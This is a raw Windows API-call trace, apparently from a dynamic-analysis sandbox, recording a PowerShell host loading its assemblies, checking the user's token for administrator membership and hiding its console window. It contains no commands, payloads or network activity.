[0072.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0072.394] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0072.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.394] CoTaskMemFree (pv=0x256340)
[0072.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
[0072.926] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0072.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.926] CoTaskMemFree (pv=0x256450)
[0072.927] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0072.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0072.927] CoTaskMemFree (pv=0x256450)
[0073.043] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0073.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.043] CoTaskMemFree (pv=0x256450)
[0073.082] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0073.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.082] CoTaskMemFree (pv=0x256450)
[0073.082] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0073.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.082] CoTaskMemFree (pv=0x256450)
[0073.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
[0073.336] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0073.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.336] CoTaskMemFree (pv=0x256450)
[0073.355] CoTaskMemAlloc (cb=0x104) returned 0x256450
[0073.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256450, nSize=0x80 | out: lpBuffer="") returned 0x0
[0073.355] CoTaskMemFree (pv=0x256450)
[0073.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0073.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0074.169] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.170] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
[0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0074.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0074.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
[0075.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0075.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
[0075.587] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0075.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0075.587] CoTaskMemFree (pv=0x256670)
[0075.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0075.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", nBufferLength=0x105, lpBuffer=0x16d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config", lpFilePart=0x0) returned 0x3c
[0075.686] SetErrorMode (uMode=0x1) returned 0x1
[0075.686] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16d8e0 | out: lpFileInformation=0x16d8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0075.686] SetErrorMode (uMode=0x1) returned 0x1
[0076.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.727] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.727] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.727] CoTaskMemFree (pv=0x256670)
[0076.755] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.755] CoTaskMemFree (pv=0x256670)
[0076.755] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.755] CoTaskMemFree (pv=0x256670)
[0076.768] CoCreateGuid (in: pguid=0x16dca8 | out: pguid=0x16dca8*(Data1=0xcb7f3176, Data2=0x75fa, Data3=0x43fc, Data4=([0]=0xad, [1]=0x83, [2]=0xd5, [3]=0x40, [4]=0xca, [5]=0xe5, [6]=0x44, [7]=0x91))) returned 0x0
[0076.791] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.791] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.791] CoTaskMemFree (pv=0x256670)
[0076.793] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.793] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.793] CoTaskMemFree (pv=0x256670)
[0076.806] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0076.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0076.806] CoTaskMemFree (pv=0x256670)
[0076.810] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
[0076.811] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16d950 | out: lpConsoleScreenBufferInfo=0x16d950) returned 1
[0076.871] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
[0076.871] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16d950 | out: lpConsoleScreenBufferInfo=0x16d950) returned 1
[0076.871] GetVersionExW (in: lpVersionInformation=0x16d8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16d8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0076.873] GetCurrentProcess () returned 0xffffffffffffffff
[0076.874] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16d978 | out: TokenHandle=0x16d978*=0x324) returned 1
[0076.875] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d898 | out: TokenInformation=0x0, ReturnLength=0x16d898) returned 0
[0076.876] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x264610
[0076.876] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x264610, TokenInformationLength=0x4, ReturnLength=0x16d898 | out: TokenInformation=0x264610, ReturnLength=0x16d898) returned 1
[0076.877] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16d9f8 | out: phNewToken=0x16d9f8*=0x320) returned 1
[0076.877] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16d898 | out: TokenInformation=0x0, ReturnLength=0x16d898) returned 0
[0076.877] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x264640
[0076.877] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x264640, TokenInformationLength=0x4, ReturnLength=0x16d898 | out: TokenInformation=0x264640, ReturnLength=0x16d898) returned 1
[0076.877] CheckTokenMembership (in: TokenHandle=0x320, SidToCheck=0x2e2e520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16da08 | out: IsMember=0x16da08) returned 1
[0076.877] CloseHandle (hObject=0x320) returned 1
[0076.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0076.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
[0077.004] SetConsoleCtrlHandler (HandlerRoutine=0x2ae677c, Add=1) returned 1
[0077.031] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.031] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.031] CoTaskMemFree (pv=0x256670)
[0077.032] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.032] CoTaskMemFree (pv=0x256670)
[0077.365] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.365] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.365] CoTaskMemFree (pv=0x256670)
[0077.370] GetConsoleWindow () returned 0x1022c
[0077.379] ShowWindow (hWnd=0x1022c, nCmdShow=0) returned 0
[0077.399] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
[0077.400] CoCreateGuid (in: pguid=0x16daf0 | out: pguid=0x16daf0*(Data1=0xafe6255a, Data2=0x2f4f, Data3=0x46de, Data4=([0]=0xaf, [1]=0xc0, [2]=0xfe, [3]=0x96, [4]=0xce, [5]=0x58, [6]=0x78, [7]=0xb))) returned 0x0
[0077.406] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.406] CoTaskMemFree (pv=0x256670)
[0077.433] WinSqmIsOptedIn () returned 0x0
[0077.434] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.434] CoTaskMemFree (pv=0x256670)
[0077.441] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.441] CoTaskMemFree (pv=0x256670)
[0077.442] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.442] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
[0077.442] CoTaskMemFree (pv=0x256670)
[0077.451] CoTaskMemAlloc (cb=0x104) returned 0x256670
[0077.451] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256670, nSize=0x80 | out: lpBuffer="") returned 0x0
